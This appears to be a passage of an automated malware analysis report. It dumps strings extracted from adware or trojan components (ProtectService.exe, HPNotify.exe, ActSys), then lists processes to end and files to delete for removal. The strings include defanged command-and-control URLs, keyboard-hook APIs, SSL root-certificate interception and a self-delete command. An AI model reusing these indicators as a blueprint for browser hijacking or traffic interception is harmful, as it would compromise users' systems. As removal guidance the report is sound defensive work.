zac.exe
kylo.exe
morequick.exe
wyzo.exe
xombrero.exe
qupzilla.exe
cometbird.exe
qtweb.exe
deepnet.exe
xtravo.exe
smartbro.exe
jumpto.exe
weblock4kids.exe
weblock.exe
comodoice.exe
srwareiron.exe
srware.exe
coolnovo.exe
cool.exe
qup.exe
browseme.exe
swiftfox.exe
omniweb.exe
omni.exe
spark.exe
bobrowser.exe
crossbrowser.exe
crossbrowse.exe
127.0.0.1
255.0.0.0
ServiceExecute
\P_CheckUpdate.txt
NOVA UPDATE DISPONIVEL! URL:
\nj_update.exe
hXXp://VVV.ninjasoftwarellc.com/services/rules.txt?dummy=
hXXp://VVV.ninjasoftwarellc.com/services/update.php?v=
&key=
\P_RuleList.txt
[E] ProductKey :
[N] ProductKey :
cmd.exe /c net start ActSys
cmd.exe /c net stop ActSys
user32.dll
GetKeyboardType
advapi32.dll
RegOpenKeyExA
RegCloseKey
ReportEventA
RegFlushKey
RegCreateKeyExA
WinExec
GetCPInfo
version.dll
gdi32.dll
SetViewportOrgEx
UnhookWindowsHookEx
SetWindowsHookExA
MsgWaitForMultipleObjects
MapVirtualKeyA
LoadKeyboardLayoutA
GetKeyboardState
GetKeyboardLayoutList
GetKeyboardLayout
GetKeyState
GetKeyNameTextA
EnumWindows
EnumThreadWindows
ActivateKeyboardLayout
wsock32.dll
nfapi.dll
nf_tcpDisableFiltering
nf_setTCPTimeout
nf_tcpClose
nf_tcpPostReceive
nf_tcpPostSend
nf_tcpSetConnectionState
psapi.dll
ProtocolFilters.dll
pfc_setRootSSLCertSubject
5l6O6W6
3?3
:!:%:6:>:
;$<(<,<0<
: :$:(:,:
5-55595P5u5}5
=#=(=0=:=
3 3$3(3,3034383<3@3
333333333333333333
33333833
3333339
3333333333333338
:*"*"$3338
3333333
33333333
33333333333
3333333333338
33338?383
333333333333
:*3:"$3338
333333333333333
KWindows
UrlMon
OnExecute
No help keyword specified.
No help found for %s#No context-sensitive help installed$No topic-based help system installed
shutdown(Service failed in custom message(%d): %s
Service installed successfully/Service "%s" failed to install with error: "%s" Service uninstalled successfully1Service "%s" failed to uninstall with error: "%s"
Error downloading URL: %s
Unable to load %s"Unable to find a Table of Contents
Alt  Clipboard does not support Icons
Cannot open clipboard/Menu '%s' is already being used by another form
Service failed on %s: %s
Unsupported clipboard format
Error creating window class Cannot focus a disabled or invisible window!Control '%s' has no parent window
Error reading %s%s%s: %s
Failed to get data for '%s'
Failed to set data for '%s'
Resource %s not found
%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration group
Property %s does not exist
Thread creation error: %s
Thread Error: %s (%d)
Class %s not found
A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates
Cannot create file "%s". %s
Cannot open file "%s". %s
Invalid stream format$''%s'' is not a valid component name
Invalid data type for '%s' List capacity out of bounds (%d)
List count out of bounds (%d)
List index out of bounds (%d)
Ancestor for '%s' not found
Cannot assign a %s to a %s
Bits index out of range*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main thread
%s (%s, line %d)
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
System Error. Code: %d.
Invalid variant operation%Invalid variant operation (%s%.8x)
%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
Operation not supported
External exception %x
Interface not supported
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Privileged instruction(Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'"Variant method calls not supported
!'%s' is not a valid integer value
I/O error %d
Integer overflow Invalid floating point operation

ProtectService.exe_3496:




.text
`.rdata
@.data
.rsrc
@.reloc
GET %s%s%s HTTP/1.1
Host: %s
%sUser-Agent: Mozilla/4.0
POST %s HTTP/1.1
%sContent-Type: %s
User-Agent: Mozilla/4.0
Content-Length: %u
%*s %d %*s
%*[ ]%[^
?456789:;<=
!"#$%&'()* ,-./0123
file_url
E:\supsoft\SupSearchProtectV4\SearchProtect\Bin\Release\ProtectService.pdb
GetProcessHeap
GetSystemWindowsDirectoryW
KERNEL32.dll
USER32.dll
RegOpenKeyW
RegCloseKey
RegOpenKeyExW
RegCreateKeyExW
ADVAPI32.dll
SHELL32.dll
MSVCP110.dll
InternetCrackUrlW
WININET.dll
WS2_32.dll
SHLWAPI.dll
MSVCR110.dll
_crt_debugger_hook
__crtUnhandledException
__crtTerminateProcess
_calloc_crt
__crtGetShowWindowMode
_amsg_exit
_wcmdln
__crtSetUnhandledExceptionFilter
WinHttpCloseHandle
WinHttpOpen
WinHttpSetTimeouts
WinHttpCrackUrl
WinHttpConnect
WinHttpOpenRequest
WinHttpSetOption
WinHttpAddRequestHeaders
WinHttpSendRequest
WinHttpGetIEProxyConfigForCurrentUser
WinHttpGetProxyForUrl
WinHttpWriteData
WinHttpReceiveResponse
WinHttpQueryHeaders
WinHttpQueryDataAvailable
WinHttpReadData
WINHTTP.dll
SensApi.dll
VERSION.dll
PSAPI.DLL
USERENV.dll
.?AVCHttpClient@@
.?AVCTcpipSocket@@
<requestedExecutionLevel level='requireAdministrator' uiAccess='false' />
2-2v2
hXXp://
Software\Microsoft\Windows\CurrentVersion\Internet Settings
http=
WinHttpClient
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) in my heart of heart.
hXXp://xa.xingcloud.com
xxxx
%u_%u
%s_%s
%s_X
\\.\PhysicalDrive%d
UpDateProcess.exe
hXXp://VVV.theviilage.com/searchprotect/up?ptid=%s&sid=%s&ln=%s_%s&ver=%s&uid=%s&dp=%s
g{2EFFE99D-743D-44D0-BBF2-F9DDDEA2F92D}
Global\{5F26509F-29FE-4598-8800-FA22CE9CC17F}__Mutex
Report HeartBeat
cmdshell.exe
hXXp://xa.xingcloud.com/v4/searchprotect/%s?action=visit.heartbeat.%s&update0=ref,%s&update1=nation,%s&update2=language,%s&update3=version,%s
hXXp://xa.xingcloud.com/v4/searchprotect/%s?action0=xa.geoip&action1=visit&action2=install
hXXp://xa.xingcloud.com/v4/searchprotect/%s?action=uninstall
explorer.exe
Advapi32.dll
"%s" %s
psapi.dll
Explorer.exe
json_value.cpp
ljson_reader.cpp
ProtectSvc.exe
4.0.1.2105

HPNotify.exe_3664:




.text
`.rdata
@.data
.rsrc
@.reloc
<9%uo
wszUrl
strUrlTemp
hKEY
strSelUrl
strUrl
strConfUrlTemp
strDsUrl
strHpUrl
strCmdLine
tCPW
%UUUU
e_GetBrowserCurrentHpUrl
e_GetBrowserCurrentDsUrl
URLDownloadToFileW
URLDownloadToFileW ret:0XX
Error : %d
inflate 1.1.3 Copyright 1995-1998 Mark Adler
1.1.3
monochrome
unsupported bit depth
`'\%D,3
Run-Time Check Failure #%d - %s
%s%s%p%s%ld%s%d%s
%s%s%s%s
RegOpenKeyExW
RegCloseKey
del /s/q %1\*.*
%suninstall.bat
E:\supsoft\SupSearchProtectV4\SearchProtect\bin\Release\HPNotify.pdb
KERNEL32.dll
GetKeyState
USER32.dll
GDI32.dll
ADVAPI32.dll
ShellExecuteW
ShellExecuteA
ShellExecuteExW
SHELL32.dll
ole32.dll
OLEAUT32.dll
SHDeleteKeyW
SHLWAPI.dll
MSVCP110.dll
MSVCR110.dll
_calloc_crt
_CRT_RTC_INITW
__crtGetShowWindowMode
_amsg_exit
_wcmdln
_crt_debugger_hook
__crtUnhandledException
__crtTerminateProcess
__crtSetUnhandledExceptionFilter
GdiplusShutdown
gdiplus.dll
IMM32.dll
DeleteUrlCacheEntryW
WININET.dll
COMCTL32.dll
GetProcessHeap
#*1892 $
%,3:;4-&
.?AVCActiveXEnum@DuiLib@@
.?AVCWebBrowserUI@DuiLib@@
<requestedExecutionLevel level='requireAdministrator' uiAccess='false' />
<assemblyIdentity type='win32' name='Microsoft.Windows.Common-Controls' version='6.0.0.0' processorArchitecture='x86' publicKeyToken='6595b64144ccf1df' language='*' />
3?3
1-2}2
77t7
9":,:6:@:
12u2
: :$:(:,:0:
4 4$4(4,404
>$?(?,?0?
2 2$2(2,20242
0 1@1\1|1
hXXp://VVV.bing.com/
hXXp://VVV.yahoo.com/
hXXp://VVV.google.com/
%sconf
web/?type=dspp&
web/?type=dspp
hXXp://VVV.v9.com/
Itemd
BrowserAction.dll
%u_%u
%s_%s
%s_X
\\.\PhysicalDrive%d
\\.\Scsi%d:
UrlEdit
conf.xml
hXXp://v9.com/license_agreement.html
hXXp://v9.com/privacy_policy.html
hXXp://xa.xingcloud.com/v4/searchprotect/%s?action=set.show.%s
hXXp://xa.xingcloud.com/v4/searchprotect/%s?action=set.other.%s
%stmp%d.tmp
urlmon.dll
main.xml
explorer.exe
Global\{5F26509F-29FE-4598-8800-FA22CE9CC17F}__Mutex
IeWatchDog.dll
BrowerWatchFF.dll
BrowerWatchCH.dll
Global\GUID(6D05BFEC-4307-4649-8963-962A24345DF4)
Amsimg32.dll
User32.dll
WM_KEYDOWN
WM_KEYUP
WM_SYSKEYDOWN
WM_SYSKEYUP
0xX
keyboard
Bmsftedit.dll
password
%s%s%s
Correct password required
%s\%s
WebBrowser
transshadow
transshadow1
dest='%d,%d,%d,%d'
dest='%d,%d,%d,%d' source='%d,%d,%d,%d'
source='%d,%d,%d,%d' dest='%d,%d,%d,%d'
M-d-d
WebBrowserUI
errorUrl
E{D27CDB6E-AE6D-11CF-96B8-444553540000}
user32.dll
MSPDB110.DLL
ADVAPI32.DLL
/c ping 127.0.0.1 -n 2 > nul && del /s/q
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
SupHPNot.exe
4,0,1,1716
SupHPNty.exe






Remove it with Ad-Aware




    

  1. Click (here) to download and install Ad-Aware Free Antivirus.
    2. 

  2. Update the definition files.
    3. 

  3. Run a full scan of your computer.
    4. 





Manual removal*




    

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):
    

    q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_nj.exe:392
    net1.exe:976
    net1.exe:2596
    net1.exe:2220
    net1.exe:2588
    q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_ps.exe:1196
    310714_is.tmp:1388
    ProtectService.exe:3496
    ProtectService.exe:3676
    ProtectService.exe:3468
    XTab_Setup2121.exe:3372
    wpm_v20.0.0.1953_0302.exe:3104
    q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_gs.exe:248
    net.exe:2552
    net.exe:1808
    net.exe:2556
    net.exe:400
    QQBrowser.exe:2908
    QQBrowser.exe:2216
    q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_cr.exe:660
    HPNotify.exe:3664
    ActSys.exe:2440
    q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_br.exe:628
    cmdshell.exe:3548
    amisetup5755__9664.exe:1532
    nfregdrv.exe:976
    nfregdrv.exe:1540
    q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_a9.exe:452
    CashReminder.exe:596
    sc.exe:3420
    sc.exe:3396
    GOSafer.exe:2464
    GOSafer.exe:2604
    WNet.exe:256
    310714_is.exe:1880
    q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_am2.exe:1180
    

    2. 

  2. Delete the original Trojan file.
    3. 

  3. Delete or disinfect the following files created/modified by the Trojan:
    

    %Documents and Settings%\%current user%\Local Settings\Temp\ActSys\SSL\import_root_cert.exe (3312 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\ActSys\SSL\nss\certutil.exe (3312 bytes)
    %Program Files%\ActSys\ActSys.exe (15536 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\ActSys\SSL\import.bat (66 bytes)
    %Program Files%\ActSys\asfilterdrv.sys (1856 bytes)
    %System%\drivers\asfilterdrv.sys (56 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\ActSys\SSL\nss\nspr4.dll (6360 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nso15.tmp\System.dll (11 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\ActSys\SSL\nss\nss3.dll (12536 bytes)
    %Program Files%\ActSys\remove_ActSys.exe (825 bytes)
    %Program Files%\ActSys\ssleay32.dll (12088 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nso15.tmp\SelfDel.dll (5 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\ActSys\SSL\nss\plds4.dll (784 bytes)
    %Program Files%\ActSys\nfapi.dll (4992 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\ActSys\SSL\nss\plc4.dll (784 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nso15.tmp\nsExec.dll (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\ActSys\SSL\nss\mozcrt19.dll (23936 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\ActSys\SSL\nss\softokn3.dll (12536 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\ActSys\SSL\nss\smime3.dll (3616 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\ActSys\SSL\NJaxSSL.cer (780 bytes)
    %Program Files%\ActSys\libeay32.dll (35507 bytes)
    %Program Files%\ActSys\nfregdrv.exe (1552 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nso15.tmp\SimpleSC.dll (1856 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsv13.tmp (130190 bytes)
    %Program Files%\ActSys\ProtocolFilters.dll (35001 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nso15.tmp\ns19.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Plain Savings\mj (3 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsfB.tmp\inetc.dll (20 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsfB.tmp\ns14.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Plain Savings\tlg (41 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Plain Savings\lm (128 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsfB.tmp\IpConfig.dll (4136 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsfB.tmp\NSISEncrypt.dll (3185 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsfB.tmp\UserInfo.dll (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsfB.tmp\ns11.tmp (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsfB.tmp\System.dll (11 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsfB.tmp\nsJSON.dll (7 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsfB.tmp\nsExec.dll (6 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsfB.tmp\WmiInspector.dll (3039 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\AHGJU1UT\MobiMidia_validation[1].js (961 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4TI7KL2V\verificar_ip[1].php (24 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\85E349A7\310113f8[1].htm (707 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4TI7KL2V\i[1].gif (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsl5.tmp (12 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KPERCTIR\verificar_ip[1].htm (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\85E349A7\010914i[1].htm (734 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\AHGJU1UT\s9[1].gif (43 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4TI7KL2V\icone_cadeado[1].gif (2 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\AHGJU1UT\carregando[1].gif (4 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsq6.tmp\nsWeb.dll (8 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\AHGJU1UT\310113f8[1].htm (8 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\AHGJU1UT\010914i[1].htm (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KPERCTIR\mt-core[1].js (55269 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KPERCTIR\top-line[1].gif (1 bytes)
    %Program Files%\XTab\web\_locales\es-ES\messages.json (3 bytes)
    %Program Files%\XTab\web\_locales\pt\messages.json (4 bytes)
    %Program Files%\XTab\searchProvider.xml (8 bytes)
    %Program Files%\XTab\web\_locales\zh-CN\messages.json (3 bytes)
    %Program Files%\XTab\web\_locales\fr-BE\messages.json (3 bytes)
    %Program Files%\XTab\web\_locales\pl\messages.json (3 bytes)
    %Program Files%\XTab\web\ver.txt (47 bytes)
    %Program Files%\XTab\web\img\icon128.png (9 bytes)
    %Program Files%\XTab\web\_locales\vi-VI\messages.json (4 bytes)
    %Program Files%\XTab\web\_locales\es-419\messages.json (3 bytes)
    %Program Files%\XTab\skin\input_bk.png (2 bytes)
    %Program Files%\XTab\web\_locales\ru\messages.json (4 bytes)
    %Program Files%\XTab\CmdShell.exe (1685 bytes)
    %Program Files%\XTab\BrowerWatchCH.dll (23 bytes)
    %Program Files%\XTab\web\_locales\fr-FR\messages.json (3 bytes)
    %Program Files%\XTab\skin\logo.png (5 bytes)
    %Program Files%\XTab\web\js\jquery-1.11.0.min.js (4726 bytes)
    %Program Files%\XTab\web\_locales\zh-TW\messages.json (3 bytes)
    %Program Files%\XTab\web\_locales\en-US\messages.json (3 bytes)
    %Program Files%\XTab\web\_locales\fr-LU\messages.json (3 bytes)
    %Program Files%\XTab\web\js\common.js (2 bytes)
    %Program Files%\XTab\web\_locales\it-IT\messages.json (4 bytes)
    %Program Files%\XTab\skin\conf.xml (8 bytes)
    %Program Files%\XTab\skin\btn.png (2 bytes)
    %Program Files%\XTab\skin\conf_back.png (1623 bytes)
    %Program Files%\XTab\web\js\library.js (4216 bytes)
    %Program Files%\XTab\web\_locales\tr-TR\messages.json (4 bytes)
    %Program Files%\XTab\install.data (93 bytes)
    %Program Files%\XTab\skin\rigth_arrow.png (2 bytes)
    %Program Files%\XTab\uninstall.exe (1343 bytes)
    %Program Files%\XTab\web\img\google_trends.png (7 bytes)
    %Program Files%\XTab\web\data.html (20 bytes)
    %Program Files%\XTab\IeWatchDog.dll (20 bytes)
    %Program Files%\XTab\skin\radio_2.png (3 bytes)
    %Program Files%\XTab\web\js\ga.js (1568 bytes)
    %Program Files%\XTab\ffsearch_toolbar!1.0.0.1028.xpi (15 bytes)
    %Program Files%\XTab\web\js\jquery.autocomplete.js (12 bytes)
    %Program Files%\XTab\web\js\xagainit2.0.js (4 bytes)
    %Program Files%\XTab\web\_locales\pt-BR\messages.json (4 bytes)
    %Program Files%\XTab\web\_locales\it-CH\messages.json (3 bytes)
    %Program Files%\XTab\skin\radio_1.png (3 bytes)
    %Program Files%\XTab\msvcp110.dll (16990 bytes)
    %Program Files%\XTab\web\_locales\fr-CA\messages.json (3 bytes)
    %Program Files%\XTab\web\indexIE.html (1 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsm1C.tmp\System.dll (11 bytes)
    %Program Files%\XTab\web\indexIE8.html (1794 bytes)
    %Program Files%\XTab\web\_locales\ru-MO\messages.json (4 bytes)
    %Program Files%\XTab\web\img\icon48.png (3 bytes)
    %Program Files%\XTab\skin\close.png (3 bytes)
    %Program Files%\XTab\skin\about.png (4 bytes)
    %Program Files%\XTab\web\js\js.js (18 bytes)
    %Program Files%\XTab\skin\settings.png (5 bytes)
    %Program Files%\XTab\web\img\icon16.png (628 bytes)
    %Program Files%\XTab\skin\about_bk.png (1436 bytes)
    %Program Files%\XTab\SupTab.dll (15406 bytes)
    %Program Files%\XTab\web\js\xagainit-ie8.js (4 bytes)
    %Program Files%\XTab\msvcr110.dll (21280 bytes)
    %Program Files%\XTab\ProtectService.exe (5309 bytes)
    %Program Files%\XTab\skin\main.xml (4 bytes)
    %Program Files%\XTab\web\main.css (19 bytes)
    %Program Files%\XTab\HPNotify.exe (17941 bytes)
    %Program Files%\XTab\conf (1694 bytes)
    %Program Files%\XTab\web\img\loading.gif (5 bytes)
    %Program Files%\XTab\skin\btn_apply.png (6 bytes)
    %Program Files%\XTab\web\img\logo32.ico (4 bytes)
    %Program Files%\XTab\BrowserAction.dll (33992 bytes)
    %Program Files%\XTab\web\_locales\fr-CH\messages.json (3 bytes)
    %Program Files%\XTab\BrowerWatchFF.dll (23 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsm18.tmp\SimpleSC.dll (1856 bytes)
    %Program Files%\GOSafer\nfregdrv.exe (1552 bytes)
    %Program Files%\GOSafer\gosafer.exe (15536 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsg17.tmp (66910 bytes)
    %System%\drivers\gosaferdrv.sys (55 bytes)
    %Program Files%\GOSafer\uninst.exe (1793 bytes)
    %Program Files%\GOSafer\ProtocolFilters.dll (9320 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsm18.tmp\SelfDel.dll (5 bytes)
    %Program Files%\GOSafer\libeay32.dll (35507 bytes)
    %Program Files%\GOSafer\ssleay32.dll (12088 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsm18.tmp\System.dll (11 bytes)
    %Program Files%\GOSafer\nfapi.dll (4992 bytes)
    %Program Files%\GOSafer\gosaferdrv.sys (1856 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\tmp\wpm_v20.0.0.1953_0302.exe (3566 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\tmp\XTab_Setup2121.exe (17629 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\B934D573F69tmp\tmp\479.db (190 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\WebDataJs (40 bytes)
    %Documents and Settings%\%current user%\Application Data\istartsurf\images\bg1.png (2 bytes)
    %Documents and Settings%\%current user%\Application Data\istartsurf\images\Thumbs.db (27 bytes)
    %Documents and Settings%\%current user%\Application Data\istartsurf\UninstallManager.exe (14022 bytes)
    %Documents and Settings%\%current user%\Application Data\istartsurf\uninstallDlg2.xml (15 bytes)
    %Documents and Settings%\%current user%\Application Data\istartsurf\images\code\code1.jpg (5 bytes)
    %Documents and Settings%\%current user%\Application Data\istartsurf\images\loading_light.png (139 bytes)
    %Documents and Settings%\%current user%\Application Data\istartsurf\images\code\code4.jpg (5 bytes)
    %Documents and Settings%\%current user%\Application Data\istartsurf\479.json (512 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk (1 bytes)
    %Documents and Settings%\%current user%\Start Menu\Programs\Internet Explorer.lnk (993 bytes)
    %Documents and Settings%\%current user%\Application Data\istartsurf\images\code\code5.jpg (4 bytes)
    %Documents and Settings%\%current user%\Application Data\istartsurf\images\code\code3.jpg (5 bytes)
    %Documents and Settings%\%current user%\Application Data\istartsurf\images\bk_shadow.png (3 bytes)
    %Documents and Settings%\%current user%\Application Data\istartsurf\images\code\Thumbs.db (42 bytes)
    %Documents and Settings%\%current user%\Application Data\istartsurf\MessageBox.xml (3 bytes)
    %Documents and Settings%\%current user%\Application Data\istartsurf\images\button1.png (1 bytes)
    %Documents and Settings%\%current user%\Application Data\istartsurf\images\loading_bg.png (159 bytes)
    %Documents and Settings%\%current user%\Application Data\istartsurf\images\scrollbar.bmp (37 bytes)
    %Documents and Settings%\%current user%\Application Data\istartsurf\images\checked.png (222 bytes)
    %Documents and Settings%\%current user%\Application Data\istartsurf\images\checkbox_select.png (783 bytes)
    %Documents and Settings%\%current user%\Application Data\istartsurf\images\unchecked.png (135 bytes)
    %Documents and Settings%\%current user%\Application Data\istartsurf\images\code\code6.jpg (5 bytes)
    %Documents and Settings%\%current user%\Application Data\istartsurf\images\close.png (3 bytes)
    %Documents and Settings%\%current user%\Application Data\istartsurf\images\code\code2.jpg (4 bytes)
    %Documents and Settings%\%current user%\Application Data\istartsurf\images\min.png (1 bytes)
    %Documents and Settings%\%current user%\Application Data\istartsurf\images\checkbox.png (545 bytes)
    %Documents and Settings%\%current user%\Application Data\istartsurf\images\button.png (3 bytes)
    %Documents and Settings%\%current user%\Application Data\istartsurf\images\bg.png (673 bytes)
    %Program Files%\CashReminder\ssleay32.dll (12088 bytes)
    %Program Files%\CashReminder\nfapi.dll (4992 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsw9.tmp\System.dll (11 bytes)
    %System%\drivers\crfilterdrv.sys (55 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsg8.tmp (67341 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsw9.tmp\SelfDel.dll (5 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsw9.tmp\SimpleSC.dll (1856 bytes)
    %Program Files%\CashReminder\libeay32.dll (35507 bytes)
    %Program Files%\CashReminder\uninstall.exe (1568 bytes)
    %Program Files%\CashReminder\nfregdrv.exe (1552 bytes)
    %Program Files%\CashReminder\CashReminder.exe (15536 bytes)
    %Program Files%\CashReminder\crfilterdrv.sys (1856 bytes)
    %Program Files%\CashReminder\ProtocolFilters.dll (9320 bytes)
    %WinDir%\Temp\ActSys\SSL\NJax Intermediate SSL.cer (782 bytes)
    %WinDir%\Temp\P_RuleList.txt (180 bytes)
    %WinDir%\Temp\ActSys\SSL\NJax Intermediate SSL.pvk (1 bytes)
    %Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\SRKX8H05\rules[1].txt (180 bytes)
    %Program Files%\WNet\nfregdrv.exe (1552 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsz10.tmp\SelfDel.dll (5 bytes)
    %Program Files%\WNet\WNet.exe (15168 bytes)
    %Program Files%\WNet\uninst.exe (1720 bytes)
    %Program Files%\WNet\ssleay32.dll (12088 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsyF.tmp (68079 bytes)
    %System%\drivers\ssfilterdrv.sys (55 bytes)
    %Program Files%\WNet\ProtocolFilters.dll (9320 bytes)
    %Program Files%\WNet\nfapi.dll (4992 bytes)
    %Program Files%\WNet\libeay32.dll (35507 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsz10.tmp\SimpleSC.dll (1856 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nsz10.tmp\System.dll (11 bytes)
    %Program Files%\WNet\ssfilterdrv.sys (1856 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\amipixel.cfg (107 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KPERCTIR\index[1].htm (2203 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4TI7KL2V\amipb[1].js (34728 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\amitest.txt (27 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\85E349A7\310714_br[1].exe (64683 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nst3.tmp\registry.dll (784 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4TI7KL2V\310714_am2[1].exe (20504 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\85E349A7\310714_cr[1] (64392 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\AHGJU1UT\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\nst3.tmp\nsWeb.dll (8 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4TI7KL2V\310714_gs[1] (64683 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Temp\Oq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N\q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_br.exe (64683 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4TI7KL2V\s9[1].gif (43 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Temp\Oq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N\q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_ps.exe (33816 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\Temp\Oq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N\q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_nj.exe (110758 bytes)
